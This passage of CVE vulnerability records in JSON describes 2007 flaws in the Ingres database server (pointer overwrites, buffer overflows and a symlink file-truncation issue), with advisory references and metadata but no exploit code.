"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-unspecified-code-execution(34993)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
},
{
"name": "ingres-pointer-code-execution(35000)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24585"
},
{
"name": "37486",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37486"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3336",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-2288",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-unspecified-code-execution(34993)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
},
{
"name": "ingres-pointer-code-execution(35000)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
},
{
"name": "24585",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24585"
},
{
"name": "37486",
"refsource": "OSVDB",
"url": "http://osvdb.org/37486"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
"refsource": "BUGTRAQ",
"url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
},
{
"name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
},
{
"name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3336",
"datePublished": "2007-06-22T18:00:00.000Z",
"dateReserved": "2007-06-21T00:00:00.000Z",
"dateUpdated": "2024-08-07T14:14:12.898Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3337 (GCVE-0-2007-3337)
Vulnerability from nvd – Published: 2007-06-22 18:00 – Updated: 2024-08-07 14:14- n/a
| URL | Tags |
|---|---|
| http://www.vupen.com/english/advisories/2007/2288 | vdb-entryx_refsource_VUPEN |
| http://www.ca.com/us/securityadvisor/newsinfo/col… | x_refsource_CONFIRM |
| http://secunia.com/advisories/25756 | third-party-advisoryx_refsource_SECUNIA |
| http://secunia.com/advisories/25775 | third-party-advisoryx_refsource_SECUNIA |
| http://www.vupen.com/english/advisories/2007/2290 | vdb-entryx_refsource_VUPEN |
| http://supportconnectw.ca.com/public/ca_common_do… | x_refsource_CONFIRM |
| http://www.ngssoftware.com/advisories/medium-risk… | x_refsource_MISC |
| http://osvdb.org/37485 | vdb-entryx_refsource_OSVDB |
| http://www.securityfocus.com/archive/1/472200/100… | mailing-listx_refsource_BUGTRAQ |
| http://www.ca.com/us/securityadvisor/vulninfo/vul… | x_refsource_CONFIRM |
| http://www.securityfocus.com/bid/24585 | vdb-entryx_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:14:12.867Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-file-truncation/"
},
{
"name": "37485",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37485"
},
{
"name": "20070625 Ingres wakeup setuid(ingres) file truncation",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/472200/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-22T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "wakeup in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allows local users to truncate arbitrary files via a symlink attack on the alarmwkp.def file."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-file-truncation/"
},
{
"name": "37485",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37485"
},
{
"name": "20070625 Ingres wakeup setuid(ingres) file truncation",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/472200/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3337",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "wakeup in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allows local users to truncate arbitrary files via a symlink attack on the alarmwkp.def file."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-2288",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-file-truncation/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-file-truncation/"
},
{
"name": "37485",
"refsource": "OSVDB",
"url": "http://osvdb.org/37485"
},
{
"name": "20070625 Ingres wakeup setuid(ingres) file truncation",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/472200/100/0/threaded"
},
{
"name": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"name": "24585",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24585"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3337",
"datePublished": "2007-06-22T18:00:00.000Z",
"dateReserved": "2007-06-21T00:00:00.000Z",
"dateUpdated": "2024-08-07T14:14:12.867Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3338 (GCVE-0-2007-3338)
Vulnerability from nvd – Published: 2007-06-22 18:00 – Updated: 2024-08-07 14:14- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:14:12.888Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20070625 Ingres verifydb local stack overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/472194/100/0/threaded"
},
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "ingres-uuidfromchar-bo(34995)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34995"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "ingres-duvegetargs-bo(34998)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34998"
},
{
"name": "20070625 Ingres stack overflow in uuid_from_char function",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/472197/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "37483",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37483"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-22T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20070625 Ingres verifydb local stack overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/472194/100/0/threaded"
},
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "ingres-uuidfromchar-bo(34995)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34995"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "ingres-duvegetargs-bo(34998)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34998"
},
{
"name": "20070625 Ingres stack overflow in uuid_from_char function",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/472197/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "37483",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37483"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3338",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20070625 Ingres verifydb local stack overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/472194/100/0/threaded"
},
{
"name": "ADV-2007-2288",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "ingres-uuidfromchar-bo(34995)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34995"
},
{
"name": "25756",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "ingres-duvegetargs-bo(34998)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34998"
},
{
"name": "20070625 Ingres stack overflow in uuid_from_char function",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/472197/100/0/threaded"
},
{
"name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "37483",
"refsource": "OSVDB",
"url": "http://osvdb.org/37483"
},
{
"name": "24585",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24585"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3338",
"datePublished": "2007-06-22T18:00:00.000Z",
"dateReserved": "2007-06-21T00:00:00.000Z",
"dateUpdated": "2024-08-07T14:14:12.888Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3334 (GCVE-0-2007-3334)
Vulnerability from nvd – Published: 2007-06-21 22:00 – Updated: 2024-08-07 14:14- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:14:12.912Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "20070621 Ingres Database Multiple Heap Corruption Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"name": "ingres-wakeup-privilege-escalation(35002)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "37488",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37488"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-communications-server-bo(34991)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"name": "37487",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37487"
},
{
"name": "1018278",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018278"
},
{
"name": "ingres-data-access-server-bo(34992)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-21T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "20070621 Ingres Database Multiple Heap Corruption Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"name": "ingres-wakeup-privilege-escalation(35002)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "37488",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37488"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-communications-server-bo(34991)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"name": "37487",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37487"
},
{
"name": "1018278",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018278"
},
{
"name": "ingres-data-access-server-bo(34992)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3334",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-2288",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "20070621 Ingres Database Multiple Heap Corruption Vulnerabilities",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"name": "ingres-wakeup-privilege-escalation(35002)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"name": "25756",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25775"
},
{
"name": "37488",
"refsource": "OSVDB",
"url": "http://osvdb.org/37488"
},
{
"name": "ADV-2007-2290",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-communications-server-bo(34991)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"name": "37487",
